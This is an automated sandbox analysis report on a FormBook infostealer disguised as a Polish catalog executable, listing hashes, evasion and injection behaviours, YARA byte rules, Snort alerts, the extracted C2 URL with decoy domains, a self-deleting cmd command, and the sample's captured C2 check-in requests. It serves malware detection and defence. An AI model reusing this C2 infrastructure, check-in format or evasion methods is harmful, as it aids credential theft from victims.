Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nowy przyk#U0142adowy katalog.exe

Overview

General Information

Sample Name:nowy przyk#U0142adowy katalog.exe
Analysis ID:515499
MD5:cbe0e49106fad96b2c1c155ce5b22abd
SHA1:25a9a38c80446b631fc1de30440caba41ff8ec74
SHA256:a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • nowy przyk#U0142adowy katalog.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
    • nowy przyk#U0142adowy katalog.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5632 cmdline: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5596, ProcessCommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", ProcessId: 5632

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: bezhantrading.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dllReversingLabs: Detection: 13%
          Machine Learning detection for sampleShow sources
          Source: nowy przyk#U0142adowy katalog.exeJoe Sandbox ML: detected
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.4b5796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.3bbc28.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.248.163.187 80
          Source: C:\Windows\explorer.exeDomain query: www.tankomixing.com
          Source: C:\Windows\explorer.exeDomain query: www.leads-mania.club
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.33 80
          Source: C:\Windows\explorer.exeDomain query: www.bezhantrading.com
          Source: C:\Windows\explorer.exeDomain query: www.americanvisionvinyl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80
          Source: C:\Windows\explorer.exeDomain query: www.iccsukltd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.affiliatemarketingproducts.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 153.127.214.206 80
          Source: C:\Windows\explorer.exeNetwork Connect: 138.68.74.116 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.156 80
          Source: C:\Windows\explorer.exeDomain query: www.worryterrible.space
          Source: C:\Windows\explorer.exeDomain query: www.alles-abgedeckt.com
          Source: C:\Windows\explorer.exeDomain query: www.dempseynutrition.com
          Source: C:\Windows\explorer.exeDomain query: www.harada-insatsu.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.affiliatemarketingproducts.xyz
          Source: DNS query: www.sddn13.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bezhantrading.com/wtcv/
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1Host: www.worryterrible.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.americanvisionvinyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1Host: www.iccsukltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.harada-insatsu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.affiliatemarketingproducts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.bezhantrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1Host: www.alles-abgedeckt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.leads-mania.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1Host: www.tankomixing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 04 Nov 2021 10:49:10 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 04 Nov 2021 10:49:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182b3d6-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
